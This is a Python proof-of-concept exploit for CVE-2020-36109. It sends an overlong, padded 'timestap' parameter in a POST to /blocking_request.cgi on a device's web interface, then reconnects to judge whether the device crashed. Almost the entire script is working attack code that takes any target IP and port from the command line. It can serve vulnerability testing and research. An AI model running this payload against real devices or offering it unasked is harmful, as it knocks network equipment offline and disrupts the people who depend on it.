#!/usr/bin/env python
import socket
import sys
import time
import hexdump


CVE = "CVE-2020-36109"
HOST = "127.0.0.1"
PORT = 80


def recvuntil(s,timeout=5):
  check_lst = ["<html><head>","<script>parent.location.href='/index.asp';</script>\x0a<meta http-equiv=\"Content-Type\" content=\"text/html\">","</head></html>"]
  check_str = "{}\x0d\x0a".format("\x0d\x0a".join(check_lst))
  data = ''
  tmp_data = '1'

  try :
    while tmp_data != '' :
      s.settimeout(timeout)
      tmp_data = s.recv(1024*8).decode('utf-8')
      data += tmp_data
  except socket.timeout :
    pass

  done = True if data.endswith(check_str) else False
  return done, data

def header():
  buff = ""
  buff += "POST /blocking_request.cgi HTTP/1.1\r\n"
  buff += "Host: {}:{}\r\n".format(HOST, PORT)
  buff += "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
  buff += "Accept: */*\r\n"
  buff += "Accept-Language: en-US,en;q=0.5\r\n"
  buff += "Accept-Encoding: gzip, deflate\r\n"
  buff += "Connection: keep-alive\r\n"
  buff += "Referer: http://{}:{}/\r\n".format(HOST, PORT)
  buff += "Sec-GPC: 1\r\n"
  buff += "Origin: http://{}:{}\r\n".format(HOST, PORT)
  buff += "Pragma: no-cache\r\n"
  buff += "Cache-Control: no-cache\r\n"
  return buff

def dos():
  buff = header()
  mac = "mac=%00"
  timestap = "timestap={}".format( int(time.time()) + 3600 + 5) + "%0a" + "A"*(0x1000-0xc-1) + "BBBB"
  buff1 = "interval=0&CName=whatever&" + timestap + "&" + mac
  buff += "Content-Length: {}\r\n".format(len(buff1))
  buff += "\r\n"
  buff += buff1
  return buff


if sys.argv[1] == "-h" or sys.argv[1] == "--help" :
  print("# Example usage: 'python3 {} <target-ip> <port>'\n".format(sys.argv[0]))
  sys.exit(0)

HOST = sys.argv[1]
PORT = 80
if len(sys.argv) > 2 :
  PORT = int(sys.argv[2])

if __name__ == "__main__" :
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))

  buff = dos().encode('utf-8')
  hexdump0 = hexdump.hexdump(buff, result='return')
  print("[-] Sending:")
  print("{}{}{}".format(hexdump0[:2233]," ...    : .. .. .. .. .. .. .. ..  .. .. .. .. .. .. .. ..  ... \n", hexdump0[-226:]))
  s.send(buff)
  done, body = recvuntil(s)

  if done :
    hexdump0 = hexdump.hexdump(body.encode('utf-8'), result='return')
    print("\n[-] Recieving:")
    print(hexdump0)

    try :
      time.sleep(4)
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s.connect((HOST, PORT))
      print("[x] Good, target isn't vulnerable to {}".format(CVE))
    except socket.error:
      print("[+] Target is vulnerable to {}".format(CVE))

    print("[+] DONE")

  else :
    print("[X] Sems that target isn't doing the '/blocking_request.cgi' action right")